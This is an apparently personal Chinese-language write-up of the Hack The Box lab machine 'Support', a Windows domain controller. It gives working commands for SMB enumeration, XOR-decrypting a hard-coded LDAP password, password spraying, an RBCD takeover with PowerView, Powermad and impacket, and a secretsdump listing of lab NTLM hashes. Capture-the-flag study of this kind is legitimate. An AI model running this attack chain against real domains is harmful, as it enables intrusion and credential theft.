基本信息

https://www.hackthebox.com/home/machines/profile/484
10.10.11.174

端口扫描

windows域环境：

$ nmap -sC -sV -Pn 10.10.11.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-07 13:24 CST
Nmap scan report for 10.10.11.174
Host is up (0.31s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-07 05:31:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-time:
|   date: 2022-08-07T05:31:46
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 519.35 seconds

SMB 445

smb可以看到一些目录

└─$ smbclient -L 10.10.11.174 -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	support-tools   Disk      support staff tools
	SYSVOL          Disk      Logon server share

support-tools

support-tools里可以得到一些文件：

└─$ smbclient //10.10.11.174/support-tools -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 21 01:01:06 2022
  ..                                  D        0  Sat May 28 19:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 19:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 19:19:55 2022
  putty.exe                           A  1273576  Sat May 28 19:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 19:19:31 2022
  UserInfo.exe.zip                    A   277499  Thu Jul 21 01:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 19:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 19:19:43 2022

		4026367 blocks of size 4096. 871743 blocks available
smb: \>

UserInfo

下载 UserInfo.exe.zip，.net exe,直接dnspy反编译发现是使用ldap查询用户信息用的，有个加密的密码,就是简单的异或：

解密得到密码：

❯ python3
Python 3.10.0 on linux
>>> enc_password = b"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
>>> key = b"armando"
>>> import base64
>>> array = base64.b64decode(enc_password)
>>> array2 = []
>>> for i in range(len(array)):
...     array2.append(chr(array[i] ^ key[i % len(key)] ^ 223))
>>> print("".join(array2))
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

ldap

根据ldap query，去通过ldap获取信息：

info里得到一个默认密码：

1
2
3

ldapsearch -D support\\ldap -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep info:

info: Ironside47pleasure40Watchful

同样ldap获取所有用户名，密码喷洒，得到一个有效账号：

ldapsearch -D support\\ldap -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep name: | sed 's/^name: //' | grep -vE 'D|C|A|U' > users.txt

crackmapexec winrm 10.10.11.174 -u users.txt -p Ironside47pleasure40Watchful

WINRM       10.10.11.174    5985   DC               [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)

user flag

得到的账号密码登录，得到user flag

提权信息

运行bloodhound，发现support用户在shared support组中，对DC有GenericAll权限

1
2
3

bloodhound-python -u support -ns 10.10.11.174 -d support.htb -c All

# 从已有的support开始，分析里查看Group Delegated Object Control，得到这个结果

这种情况，可以通过RBCD进行：

Kerberos Resource-based Constrained Delegation: Computer Object Takeover - Red Teaming Experiments
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution

RBCD

使用powerview和powermad，上传导入模块后一步步：

Import-Module .\PowerView.ps1
Import-Module .\Powermad.ps1

# 新建一个机器账户
New-MachineAccount -MachineAccount miao01 -Password $(ConvertTo-SecureString 'miao123456' -AsPlainText -Force) -Verbose
# 获取我们创建的账户的sid
Get-DomainComputer miao01 -Properties objectsid
S-1-5-21-1677581083-3380853377-188903654-5102

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5102)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# 修改目标机器安全描述符
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

#  获取票据
impacket-getST support.htb/miao01:miao123456 -dc-ip 10.10.11.174 -impersonate administrator -spn www/dc.support.htb

root flag

使用得到的票据登录，root flag：

1
2
3

export KRB5CCNAME=administrator.ccache

impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k

secretdump

$ python3 ~/Tools/impacket/examples/secretsdump.py support.htb/administrator@dc.support.htb -just-dc-ntlm -no-pass -k
Impacket v0.10.1.dev1 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6303be52e22950b5bcb764ff2b233302:::
ldap:1104:aad3b435b51404eeaad3b435b51404ee:b735f8c7172b49ca2b956b8015eb2ebe:::
support:1105:aad3b435b51404eeaad3b435b51404ee:11fbaef07d83e3f6cde9f0ff98a3af3d:::
smith.rosario:1106:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
hernandez.stanley:1107:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
wilson.shelby:1108:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
anderson.damian:1109:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
thomas.raphael:1110:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
levine.leopoldo:1111:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
raven.clifton:1112:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
bardot.mary:1113:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
cromwell.gerard:1114:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
monroe.david:1115:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
west.laura:1116:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
langley.lucy:1117:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
daughtler.mabel:1118:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
stoll.rachelle:1119:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
ford.victoria:1120:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:4c3ab1a0eed84c759a7fc9b18dd8a865:::
MANAGEMENT$:2601:aad3b435b51404eeaad3b435b51404ee:3f99f2f26988d1f348d378e84f86bc58:::
attackersystem$:5101:aad3b435b51404eeaad3b435b51404ee:ef266c6b963c0bb683941032008ad47f:::
miao01$:5102:aad3b435b51404eeaad3b435b51404ee:5cfc31356a652662201e5072ec5dfd25:::
[*] Cleaning up...

参考资料

Kerberos Resource-based Constrained Delegation: Computer Object Takeover - Red Teaming Experiments
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
Support - HTB [Discussion] | BreachForums
https://breached.to/Thread-Support-HTB-Discussion
Writeup Support HackTheBox
https://gatogamer1155.github.io/hackthebox/support/

Support - HackTheBox

2022-08-07